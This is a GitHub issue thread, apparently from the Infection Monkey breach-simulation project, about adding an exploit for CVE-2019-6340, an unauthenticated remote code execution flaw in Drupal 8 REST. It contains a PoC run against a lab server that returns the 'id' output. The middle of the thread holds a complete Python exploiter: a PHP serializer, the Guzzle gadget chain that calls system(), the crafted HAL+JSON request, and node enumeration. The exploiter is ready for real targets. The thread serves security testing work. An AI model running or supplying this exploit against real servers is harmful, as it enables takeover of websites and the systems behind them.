CVE-2019-6340 (Drupal exploit) #669

Closed · 2 tasks · ShayNehmad opened this issue May 27, 2020 · 5 comments · Fixed by #808
Labels: Feature (issue that describes a new feature to be implemented)

ShayNehmad (Contributor) commented May 27, 2020

https://gist.github.com/leonjza/d0ab053be9b06fa020b66f00358e3d88/f9f6a5bb6605745e292bee3a4079f261d891738a

  • Add the exploit to Monkey
  • Add the exploit test to Zoo
ShayNehmad added the e/3 and Feature labels May 27, 2020
ShayNehmad added this to the 1.9.0 milestone May 27, 2020
ophirharpazg (Contributor) commented Jun 14, 2020

  • Decide which class is more appropriate for this exploit (WebRCE or HostExploiter)
  • Add a new exploit file and make it run some dummy code when Drupal port / server is found
  • Get a vulnerable Drupal server up and running
  • Integrate the exploit code into the monkey (logs, telemetry)
  • Add content on exploit findings to the Monkey report (CVE details, mitigation)
  • Add an automatic test to the Monkey Zoo

Some more things:

  • Is a scanner needed to identify Drupal servers? Or should we simply add a port number to the configuration?

VakarisZ (Contributor) commented

Use WebRCE for this one. Regarding ports, I think we have a list of web ports that we try for all web exploits. If Drupal has a unique default port then add it to config, but as far as scanning goes, we only need a custom scanner if the actual exploit attempt takes a long time.

ophirharpazg (Contributor) commented

FWIW, to set up a vulnerable Drupal server I used this tutorial, and made sure the following modules are installed (in the Drupal UI Extend menu):

  • REST Web Services
  • HTTP Basic Authentication
  • Node

For experimenting with the exploit quoted in this issue, you need to be acquainted with clearing the cache, which is done from the Configuration > Performance menu.

Running the exploit looks like this:

PS C:\Users\ophir.harpaz\Desktop\Guardicore\monkey\drupal> python .\cve-2019-6340.py http://172.23.74.255/ id
CVE-2019-6340 Drupal 8 REST Services Unauthenticated RCE PoC
 by @leonjza

References:
 https://www.drupal.org/sa-core-2019-003
 https://www.ambionics.io/blog/drupal8-rce

[warning] Caching heavily affects reliability of this exploit.
Nodes are used as they are discovered, but once they are done,
you will have to wait for cache expiry.

Targetting http://172.23.74.255/...
[+] Finding a usable node id...
[+] Using node_id 1
requesting http://172.23.74.255/node/1
[+] Target appears to be vulnerable!

uid=33(www-data) gid=33(www-data) groups=33(www-data)
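
The pieces a Monkey-style exploiter for this CVE needs, as an added example that is not Infection Monkey's code and not leonjza's PoC. The request shape (GET /node/<id>?_format=hal_json with a HAL+JSON body whose link "options" string Drupal hands to unserialize()) and the GuzzleHttp FnStream -> HandlerStack::resolve -> system() gadget follow the ambionics write-up cited in the PoC output above; the PHP serializer, the node-id walk over 1..20, the marker-based capture of the command output, the bookkeeping of already-used nodes (the PoC's caching warning) and the fake_send stand-in for a vulnerable server are this example's own assumptions, as is reusing the 172.23.74.255 target address from the run above. Everything runs offline against fake_send; for a real target, pass a send callable that wraps requests.request and returns (status_code, text).

```python
# Added example, not Infection Monkey's or leonjza's code (see the lead-in).
# The HTTP layer is a pluggable send(method, url, headers, body) -> (status, text)
# callable, so everything here runs offline against fake_send at the bottom.
import json
import re
import secrets
from collections import namedtuple
from dataclasses import dataclass, field
from typing import Callable, Dict, Optional, Set, Tuple

Send = Callable[[str, str, Dict[str, str], Optional[str]], Tuple[int, str]]
PHPObject = namedtuple("PHPObject", "cls props")  # class name, {prop: value}
PHPRef = namedtuple("PHPRef", "index")            # r:N back-reference, N is 1-based

def php_serialize(value) -> str:
    """Minimal PHP serialize() covering the types the gadget chain needs."""
    if isinstance(value, PHPRef):
        return f"r:{value.index};"
    if isinstance(value, bool):  # checked before int: bool is an int subclass
        return f"b:{int(value)};"
    if isinstance(value, int):
        return f"i:{value};"
    if isinstance(value, str):
        return f's:{len(value.encode())}:"{value}";'
    if isinstance(value, list):
        value = dict(enumerate(value))
    if isinstance(value, dict):
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in value.items())
        return f"a:{len(value)}:{{{body}}}"
    if isinstance(value, PHPObject):
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in value.props.items())
        return f'O:{len(value.cls.encode())}:"{value.cls}":{len(value.props)}:{{{body}}}'
    raise TypeError(f"unsupported type {type(value).__name__}")

FN_STREAM = "GuzzleHttp\\Psr7\\FnStream"
HANDLER_STACK = "GuzzleHttp\\HandlerStack"

def _private(cls: str, name: str) -> str:
    return f"\x00{cls}\x00{name}"  # PHP stores private props as "\0Class\0name"

def build_gadget(command: str) -> str:
    """FnStream::__destruct -> HandlerStack::resolve -> system($command)."""
    stack = PHPObject(HANDLER_STACK, {
        _private(HANDLER_STACK, "handler"): command,  # becomes system()'s first argument
        _private(HANDLER_STACK, "stack"): [["system"]],
        _private(HANDLER_STACK, "cached"): False,
    })
    return php_serialize(PHPObject(FN_STREAM, {
        _private(FN_STREAM, "methods"): {"close": [stack, "resolve"]},
        "_fn_close": [PHPRef(4), "resolve"],  # r:4 is the HandlerStack above
    }))

def build_request_body(base_url: str, command: str) -> str:
    """HAL+JSON body; Drupal passes the link's 'options' string to unserialize()."""
    return json.dumps({
        "link": [{"value": "link", "options": build_gadget(command)}],
        "_links": {"type": {"href": f"{base_url}/rest/type/shortcut/default"}},
    })

@dataclass
class DrupalRestExploiter:
    base_url: str
    send: Send
    max_node_id: int = 20  # assumed search range for an existing node
    used_nodes: Set[int] = field(default_factory=set)

    def find_usable_node(self) -> Optional[int]:
        # Skip nodes already exploited: Drupal serves them from cache until expiry.
        for node_id in range(1, self.max_node_id + 1):
            if node_id in self.used_nodes:
                continue
            status, _ = self.send("GET", f"{self.base_url}/node/{node_id}?_format=hal_json", {}, None)
            if status == 200:
                return node_id
        return None

    def run(self, command: str) -> Optional[str]:
        """Run `command` on the target; returns its output or None on failure."""
        node_id = self.find_usable_node()
        if node_id is None:
            return None
        marker = secrets.token_hex(8)  # fences the output inside Drupal's response
        _, text = self.send(
            "GET", f"{self.base_url}/node/{node_id}?_format=hal_json",
            {"Content-Type": "application/hal+json"},
            build_request_body(self.base_url, f"echo {marker}; {command}; echo {marker}"))
        self.used_nodes.add(node_id)
        found = re.search(re.escape(marker) + r"\n(.*?)\n" + re.escape(marker), text, re.S)
        return found.group(1) if found else None

FAKE_OUTPUT = {"id": "uid=33(www-data) gid=33(www-data) groups=33(www-data)"}  # constructed

def fake_send(method: str, url: str, headers: Dict[str, str], body: Optional[str]) -> Tuple[int, str]:
    """Constructed vulnerable server: only node 1 exists; a gadget request 'runs' the handler string."""
    if body is None:
        return (200, "{}") if url.endswith("/node/1?_format=hal_json") else (404, "")
    options = json.loads(body)["link"][0]["options"]
    command = re.search(r'handler";s:\d+:"(.*?)";', options).group(1)
    lines = [s[5:] if s.startswith("echo ") else FAKE_OUTPUT.get(s, "")
             for s in (part.strip() for part in command.split(";"))]
    return 200, "\n".join(lines) + '\n{"message":"rest of the Drupal response"}'
```

DrupalRestExploiter("http://172.23.74.255", fake_send).run("id") returns the www-data uid line; a second run on the same exploiter returns None because node 1 is marked used and the fake server has no other node, which is the cache situation the PoC warns about. The serializer computes every s:N length itself, so a command of any length produces a well-formed payload.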

itaymmguardicore modified the milestones: 1.9.0, 1.10.0 Aug 11, 2020
ophirharpazg (Contributor) commented

[image: screenshot attached to the comment]

ophirharpazg mentioned this issue Aug 27, 2020
VakarisZ (Contributor) commented

Nice! But icons tell me that you need to backmerge
